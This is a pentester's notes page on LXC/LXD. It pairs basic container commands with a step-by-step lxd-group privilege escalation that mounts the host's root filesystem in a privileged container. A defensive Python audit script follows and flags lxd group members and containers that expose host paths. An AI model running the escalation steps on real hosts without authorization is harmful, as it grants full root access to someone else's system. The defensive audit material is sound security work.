Linux Containers (LXC)
Linux Containers (LXC) is a Linux-only, operating-system-level virtualization method for running multiple isolated Linux systems on top of the host's kernel.
Docker was originally built on top of LXC. It adds features and a simpler interface, and both share the notions of 'image' and 'container'.
LXC can only be used on Linux hosts. Users in the lxd group can run lxc commands without sudo.
$ lxd init
$ lxc image list # list downloaded images
If you have internet access, you can download an image:
$ lxc launch ubuntu:22.04 container_name
Alternatively, you can import an image from a file. You can build an Alpine image (~3 MB) using lxd-alpine-builder (0.2k ⭐, 2021 🪦).
$ git clone https://github.com/saghul/lxd-alpine-builder
$ cd lxd-alpine-builder
$ sudo bash build-alpine
Transfer the generated tar.gz onto the target and use:
$ lxc image import xxx.tar.gz --alias image_name
Pentester Notes ⚠️
LXD Group Privilege Escalation
Membership in the lxd group can be leveraged for privilege escalation: the host's / is mounted inside a privileged container at /mnt/hostfs/, which gives read and write access to every file on the host. From a defensive point of view, treat lxd group membership as equivalent to root access on the host.
- image_name is the name of the image you want to use
- container_name is an arbitrary name, such as pwned
- device_name doesn't matter; you can use pwned too
host$ lxc init image_name container_name -c security.privileged=true
host$ lxc config device add container_name device_name disk source=/ path=/mnt/hostfs recursive=true
host$ lxc start container_name
host$ lxc exec container_name /bin/sh
container$ cd /mnt/hostfs/
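To detect the situation the steps above create, a host administrator can check two things: who is in the lxd group, and which containers are privileged and expose a host path as a disk device. The script below is an added example, not part of the original notes. It parses the text of /etc/group and the JSON printed by `lxc list --format json` (it assumes the `expanded_config` and `expanded_devices` fields that LXD emits in that output); the sample group file and container list embedded in it are constructed.

```python
"""Audit helper: find lxd group members and containers that expose the host
filesystem (privileged + a disk device whose source is a host path).

Added example, not from the original notes. Sample inputs are constructed.
"""
import json
import subprocess
import sys

# Constructed sample of /etc/group (only the lines relevant here).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:alice
lxd:x:998:alice,bob
"""

# Constructed sample shaped like `lxc list --format json` output, reduced to
# the fields this audit reads. "web" is a normal container; "pwned" matches
# the escalation recipe above (privileged, host / mounted at /mnt/hostfs).
SAMPLE_LXC_LIST = json.dumps([
    {
        "name": "web",
        "expanded_config": {"security.privileged": "false"},
        "expanded_devices": {
            "root": {"type": "disk", "path": "/", "pool": "default"},
        },
    },
    {
        "name": "pwned",
        "expanded_config": {"security.privileged": "true"},
        "expanded_devices": {
            "root": {"type": "disk", "path": "/", "pool": "default"},
            "pwned": {"type": "disk", "source": "/", "path": "/mnt/hostfs",
                      "recursive": "true"},
        },
    },
])


def lxd_group_members(group_file_text):
    """Return the user names listed in the lxd group (empty list if none)."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [member for member in fields[3].split(",") if member]
    return []


def host_fs_exposing_containers(lxc_list_json):
    """Return one finding per disk device whose source is a host path.

    A disk device backed by a storage pool has no "source" key, so it is
    ignored. A finding is "critical" when the container is also privileged
    (root inside == root on the host), otherwise "warning".
    """
    findings = []
    for instance in json.loads(lxc_list_json):
        config = instance.get("expanded_config", {})
        privileged = str(config.get("security.privileged", "false")).lower() == "true"
        for dev_name, dev in instance.get("expanded_devices", {}).items():
            source = dev.get("source")
            if dev.get("type") != "disk" or not source or not source.startswith("/"):
                continue
            findings.append({
                "container": instance["name"],
                "device": dev_name,
                "source": source,
                "path": dev.get("path"),
                "privileged": privileged,
                "severity": "critical" if privileged else "warning",
            })
    return findings


def audit(group_file_text, lxc_list_json):
    """Combine both checks into a single report dictionary."""
    return {
        "lxd_group_members": lxd_group_members(group_file_text),
        "host_fs_mounts": host_fs_exposing_containers(lxc_list_json),
    }


if __name__ == "__main__":
    # Run with --live on an LXD host to audit real data; otherwise use samples.
    if "--live" in sys.argv:
        with open("/etc/group") as fh:
            group_text = fh.read()
        lxc_json = subprocess.run(["lxc", "list", "--format", "json"],
                                  check=True, capture_output=True, text=True).stdout
    else:
        group_text, lxc_json = SAMPLE_GROUP_FILE, SAMPLE_LXC_LIST
    print(json.dumps(audit(group_text, lxc_json), indent=2))
```

Only a device with an explicit host `source` is reported; the container's own root disk comes from a storage pool and carries no `source`, so it is not a finding. Every lxd group member is listed regardless, since the group itself is the real exposure.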
👻 To-do 👻
Stuff that I found, but never read/used yet.
$ sudo apt-get install lxc lxc-utils -y
$ sudo lxc-create -n xxx -t yyy
$ lxc-ls
$ lxc-start/stop/restart -n xxx
$ lxc-config -n xxx -s storage/network/security
$ lxc-attach -n xxx [-f /path/to/share]